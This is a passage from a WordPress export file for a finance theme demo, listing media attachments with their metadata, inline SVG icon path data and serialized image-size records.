		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/strategy.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1871</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:16:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:16:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[strategy]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/strategy.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/strategy.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M267.3,479.04H65.56c-2.311,0-4.19-1.879-4.19-4.19v-52.436h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.032h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.039-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37V19.19c0-2.311,1.879-4.19,4.19-4.19h52.74c4.142,0,7.5-3.358,7.5-7.5   S122.442,0,118.3,0H65.56C54.979,0,46.37,8.608,46.37,19.19v52.437h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.032h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v52.436c0,10.582,8.608,19.19,19.19,19.19H267.3c4.142,0,7.5-3.358,7.5-7.5   S271.442,479.04,267.3,479.04z M27.426,97.088c0-5.769,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003   s0.038-0.003,0.058-0.003h15.928c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887   C32.119,107.549,27.426,102.856,27.426,97.088z M27.426,197.043c0-5.769,4.693-10.461,10.461-10.461h31.969   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H53.957c-0.029,0-0.058-0.004-0.087-0.004   s-0.058,0.004-0.087,0.004H37.887C32.119,207.504,27.426,202.812,27.426,197.043z M27.426,296.998   c0-5.768,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003s0.038-0.003,0.058-0.003h15.928   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887C32.119,307.459,27.426,302.767,27.426,296.998z    M27.426,396.953c0-5.769,4.693-10.461,10.461-10.461h31.969c5.768,0,10.461,4.693,10.461,10.461   c0,5.768-4.693,10.461-10.461,10.461H53.948c-0.026,0-0.051-0.004-0.077-0.004s-0.051,0.004-0.077,0.004H37.887   C32.119,407.414,27.426,402.721,27.426,396.953z"></path>
	<path d="M148.295,15h202.564c20.029,0,36.325,16.295,36.325,36.325v133.679c0,4.142,3.358,7.5,7.5,7.5s7.5-3.358,7.5-7.5V51.325   C402.184,23.024,379.159,0,350.859,0H148.295c-4.142,0-7.5,3.358-7.5,7.5S144.153,15,148.295,15z"></path>
	<path d="M476.084,447.256v-4.661c0-8.921-5.646-16.549-13.551-19.499l-2.458-59.614c-0.171-4.139-3.655-7.359-7.803-7.185   c-4.139,0.171-7.355,3.664-7.185,7.803l2.701,65.501c0.166,4.019,3.472,7.191,7.494,7.191c3.199,0,5.802,2.603,5.802,5.802v4.627   H328.282v-4.627c0-3.199,2.603-5.802,5.803-5.802c4.022,0,7.328-3.172,7.494-7.191l5.259-127.533h95.691l1.292,31.323   c0.171,4.138,3.659,7.355,7.803,7.185c4.139-0.17,7.355-3.664,7.185-7.803l-1.266-30.705h16.948c3.875,0,7.113-2.953,7.468-6.812   l7.575-82.241c0.193-2.1-0.506-4.184-1.927-5.742c-1.421-1.558-3.432-2.446-5.541-2.446h-32.193c-4.142,0-7.5,3.358-7.5,7.5v18.054   h-13.973l-2.248-18.938c-0.448-3.774-3.647-6.616-7.448-6.616h-48.04c-3.8,0-7,2.842-7.448,6.616l-2.248,18.938h-13.972v-18.054   c0-4.142-3.358-7.5-7.5-7.5h-32.193c-2.109,0-4.12,0.888-5.541,2.446c-1.421,1.558-2.121,3.642-1.927,5.742l7.575,82.241   c0.355,3.859,3.593,6.812,7.468,6.812h16.948l-4.991,121.027c-7.906,2.95-13.552,10.578-13.552,19.499v4.661   c-13.066,0.672-23.489,11.512-23.489,24.742V504.5c0,4.142,3.358,7.5,7.5,7.5h194.781c4.142,0,7.5-3.358,7.5-7.5v-32.502   C499.574,458.768,489.15,447.927,476.084,447.256z M315.525,219.828h16.471v18.054c0,4.142,3.358,7.5,7.5,7.5h28.135   c3.8,0,7-2.842,7.448-6.616l2.248-18.938h34.714l2.248,18.938c0.448,3.774,3.647,6.616,7.448,6.616h28.135   c4.142,0,7.5-3.358,7.5-7.5v-18.054h16.47l-6.193,67.241h-17.922H339.641h-17.923L315.525,219.828z M484.574,497H304.793v-25.002   c0-5.39,4.385-9.775,9.775-9.775h6.214h147.802h6.214c5.39,0,9.775,4.385,9.775,9.775V497z"></path>
	<path d="M217.372,92.562c0-18.108-14.732-32.84-32.84-32.84c-18.108,0-32.84,14.732-32.84,32.84s14.732,32.84,32.84,32.84   C202.64,125.401,217.372,110.669,217.372,92.562z M166.691,92.562c0-9.837,8.003-17.84,17.84-17.84   c9.837,0,17.84,8.003,17.84,17.84s-8.003,17.84-17.84,17.84C174.694,110.401,166.691,102.398,166.691,92.562z"></path>
	<path d="M187.046,226.088c-4.03,0.958-6.52,5.002-5.562,9.032c1.208,5.078,2.677,10.156,4.368,15.095   c1.066,3.114,3.978,5.073,7.095,5.073c0.805,0,1.625-0.131,2.43-0.406c3.919-1.342,6.008-5.606,4.667-9.525   c-1.535-4.484-2.87-9.096-3.966-13.707C195.12,227.619,191.075,225.13,187.046,226.088z"></path>
	<path d="M184.532,181.222c-4.142,0-7.5,3.358-7.5,7.5v8.252c0,2.347,0.05,4.724,0.149,7.063c0.17,4.031,3.491,7.183,7.488,7.183   c0.107,0,0.215-0.002,0.323-0.007c4.138-0.175,7.351-3.672,7.176-7.811c-0.09-2.129-0.136-4.292-0.136-6.428v-8.252   C192.032,184.58,188.674,181.222,184.532,181.222z"></path>
	<path d="M285.918,335.648c-4.399-1.759-8.769-3.755-12.986-5.933c-3.682-1.9-8.206-0.456-10.105,3.224   c-1.9,3.681-0.457,8.205,3.224,10.105c4.643,2.396,9.453,4.594,14.297,6.531c0.913,0.365,1.855,0.538,2.782,0.538   c2.977,0,5.793-1.784,6.966-4.717C291.635,341.551,289.764,337.187,285.918,335.648z"></path>
	<path d="M219.523,283.323c-2.747-3.866-5.337-7.91-7.7-12.017c-2.066-3.59-6.649-4.826-10.241-2.761   c-3.59,2.066-4.826,6.651-2.761,10.241c2.601,4.52,5.451,8.968,8.473,13.223c1.463,2.059,3.774,3.157,6.121,3.157   c1.502,0,3.019-0.45,4.337-1.386C221.128,291.382,221.921,286.7,219.523,283.323z"></path>
	<path d="M239.667,326.047c1.376,1.085,3.013,1.611,4.639,1.611c2.218,0,4.414-0.98,5.894-2.856   c2.565-3.252,2.007-7.968-1.245-10.533c-3.723-2.936-7.35-6.087-10.778-9.365c-2.995-2.863-7.742-2.757-10.604,0.238   c-2.863,2.994-2.756,7.741,0.238,10.604C231.583,319.352,235.572,322.818,239.667,326.047z"></path>
	<path d="M224.3,192.801c2.769-3.081,2.515-7.823-0.565-10.592l-34.19-30.725c-0.041-0.037-0.085-0.068-0.127-0.104   c-0.087-0.075-0.177-0.148-0.268-0.219c-0.098-0.077-0.197-0.152-0.298-0.223c-0.091-0.064-0.184-0.126-0.278-0.187   c-0.107-0.068-0.214-0.134-0.324-0.197c-0.096-0.055-0.192-0.107-0.29-0.158c-0.113-0.058-0.226-0.112-0.341-0.164   c-0.101-0.046-0.202-0.09-0.304-0.131c-0.118-0.047-0.236-0.089-0.355-0.13c-0.104-0.036-0.208-0.071-0.315-0.102   c-0.126-0.037-0.253-0.068-0.381-0.098c-0.102-0.024-0.203-0.05-0.306-0.07c-0.15-0.029-0.3-0.049-0.451-0.069   c-0.084-0.011-0.167-0.026-0.251-0.034c-0.481-0.047-0.966-0.047-1.447,0c-0.083,0.008-0.163,0.022-0.245,0.033   c-0.153,0.02-0.306,0.041-0.458,0.07c-0.101,0.019-0.199,0.045-0.299,0.068c-0.13,0.031-0.26,0.062-0.389,0.1   c-0.104,0.03-0.205,0.065-0.307,0.1c-0.122,0.042-0.243,0.085-0.364,0.133c-0.1,0.04-0.199,0.083-0.297,0.127   c-0.118,0.053-0.234,0.109-0.349,0.168c-0.096,0.049-0.19,0.101-0.283,0.154c-0.112,0.064-0.221,0.131-0.33,0.201   c-0.092,0.059-0.183,0.12-0.273,0.183c-0.102,0.072-0.203,0.148-0.302,0.226c-0.09,0.071-0.179,0.143-0.266,0.217   c-0.042,0.036-0.086,0.067-0.128,0.104l-34.19,30.725c-3.081,2.769-3.334,7.511-0.565,10.592c1.481,1.648,3.527,2.487,5.581,2.487   c1.786,0,3.578-0.634,5.011-1.921l29.177-26.22l29.177,26.22C216.79,196.135,221.531,195.882,224.3,192.801z"></path>
	<path d="M213.736,370.946c-2.929-2.929-7.678-2.929-10.606,0l-18.598,18.598l-18.598-18.598c-2.929-2.929-7.678-2.929-10.606,0   c-2.929,2.929-2.929,7.678,0,10.606l18.598,18.598l-18.598,18.598c-2.929,2.929-2.929,7.678,0,10.606   c1.464,1.464,3.384,2.197,5.303,2.197s3.839-0.732,5.303-2.197l18.598-18.598l18.598,18.598c1.464,1.464,3.384,2.197,5.303,2.197   s3.839-0.732,5.303-2.197c2.929-2.929,2.929-7.678,0-10.606l-18.598-18.598l18.598-18.598   C216.665,378.624,216.665,373.875,213.736,370.946z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>hourglass</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/hourglass/</link>
		<pubDate>Wed, 11 Nov 2020 07:54:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/hourglass.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1872</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:54:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:54:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[hourglass]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/hourglass.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/hourglass.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image3-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/image3-home4/</link>
		<pubDate>Wed, 11 Nov 2020 08:46:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image3-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1879</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 08:46:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 08:46:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image3-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image3-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image3-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:710;s:6:"height";i:620;s:4:"file";s:24:"2020/11/image3-home4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"image3-home4-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image3-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image3-home4-710x600.jpg";s:5:"width";i:710;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team1-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/team1-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:01:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team1-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1896</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:01:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:01:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team1-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team1-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team1-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team1-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team1-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team3-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/team3-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:01:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team3-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1897</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:01:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:01:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team3-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team3-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team3-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team3-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team3-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team4-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/team4-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:01:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team4-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1898</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:01:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:01:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team4-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team4-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team4-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team4-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team4-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team2-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/team2-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:05:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team2-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1903</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:05:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:05:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team2-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team2-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team2-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team2-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team2-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/bg2-home4/</link>
		<pubDate>Wed, 11 Nov 2020 10:07:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1910</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:07:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:07:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
